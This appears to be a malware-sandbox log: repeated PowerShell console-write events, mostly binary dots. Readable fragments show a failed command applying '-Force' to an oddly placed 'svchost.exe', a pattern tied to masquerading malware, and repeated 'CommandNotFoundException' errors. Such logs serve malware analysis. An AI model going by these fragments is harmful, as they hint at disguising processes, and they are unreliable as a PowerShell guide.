                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............(.......0...............................0.......S.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............(.......\...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.............(.......\...............................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............(...............'.......................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............(...............R.......................0.......k.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............(...............m.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............(.......0...............................0.......w.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......................................0.......................l.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......0.......H.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......0.......f.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....D...............H...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....D.......................*.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....D...............H.......j.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....D...............................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....D...............................................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....D...............................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7......./.......................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....D......................._.......................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....D...............................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....D...............................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....D...............\...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....D...............\.......C.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....D.......................j.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....D...............0...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............0...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............0.......N.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....D...............0...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............L...............+.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............L...............J.......................0.......#.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............L.......$.......v.......................0......./.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............L.......$...............................0......./.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............L.......................................0.......;...............|.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............L.......................................0.......;.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......#.......................0.......G.......X.......".......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............L...............C.......................0.......G.......X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............L...............q.......................0.......S.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............L.......................................0.......S.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............L.......................................0......._.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............L.......................................0......._.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.L.......................................0.......k.......X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............L...............$.......................0.......k.......X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............L...............b.......................0.......w.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............L.......................................0.......w.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............X.......2.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L.......................................0...............X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L.......................................0.......................l.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L...............B.......................0...............X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............L...............p.......................0...............X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L.......................................0...............X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................h.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......0.......................0.......G...............".......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............................L.......................0.......G.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................z.......................0.......S.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................!.......................0.......k.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................A.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................X...............................0.......w.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................%.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................B.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............H.......................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............H.............../.......................0.......#.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............H...............Y.......................0......./.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............H...............w.......................0......./.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............H.......................................0.......;...............|.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............H...............&.......................0.......;.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......p.......................0.......G.......H.......".......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............H.......................................0.......G.......H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............H.......................................0.......S.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............H.......................................0.......S.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............H.......................................0......._.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............H.......................................0......._.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.H.......................................0.......k.......H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............H...............U.......................0.......k.......H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............H.......................................0.......w.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............H.......................................0.......w.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............H.......2.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............H...............L.......................0...............H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............H...............{.......................0.......................l.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............H.......................................0...............H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............H.......................................0...............H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............H.......................................0...............H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................'.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................Q.......................0......./.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................l.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................v.......................0.......S.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P............................._.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................!.......................0.......................l.......x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................P.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................}.......................0...............................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................x.4.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................#...............(.P.....P...............................................0.......#.........".............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....P...............................................0.......#.......(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."...................../...............(.P.....P.......................*.......................0......./.........".............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....P.......................L.......................0......./.......(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................;...............(.P.....P.......................}.......................0.......;.........".....|.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....P...............................................0.......;.......(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......(.......".......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....P...............................................0.......G.......(...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................S...............(.P.....P.......................3.......................0.......S.........".............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....P.......................N.......................0.......S.......(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."....................._...............(.P.....P...............................................0......._.........".............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....P...............................................0......._.......(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.........................................0.......k.......(...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....P...............................................0.......k.......(...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................w...............(.P.....P...............................................0.......w.........".............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....P.......................;.......................0.......w.......(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............(.......2.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................0...............(...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.....P...............................................0.................".....l.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................5.......................0...............(.................".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....P.......................c.......................0...............(...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................0...............(...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P............................./.......................0......./.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......U.......................0.......G.......X.......".......X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......X...............X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................B.......................0.......S.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......X...............X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................t...............................0......._.......X...............X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P............................./.......................0.......k.......................X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......X.......2.......X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................t.......<.......................0.......w.......X...............X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................t.......i.......................0.......................l.......X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............X...............X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................7.......................0...............X...............X.".............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....p...............................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....p.......................#.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....p.......................c.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....p...............................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....p...............................................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....p...............h...............................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....p...............................................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....p...............h...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....p...............h...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....p...............`.......4.......................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....p...............h.......U.......................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.........................................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....p...............................................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....p...............`...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....p.......................!.......................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......................2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p...............h.......q.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p...............................................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p...............................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....p...............................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p.......................0.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................h.......!.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................h.......J.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................h.......x.......................0......./.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................h...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................`...............................0.......;...............|.........'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................`...............................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......'.......................0.......G...............".........'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................h.......E.......................0.......G.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................`.......v.......................0.......S.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................h.......T.......................0.......k.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
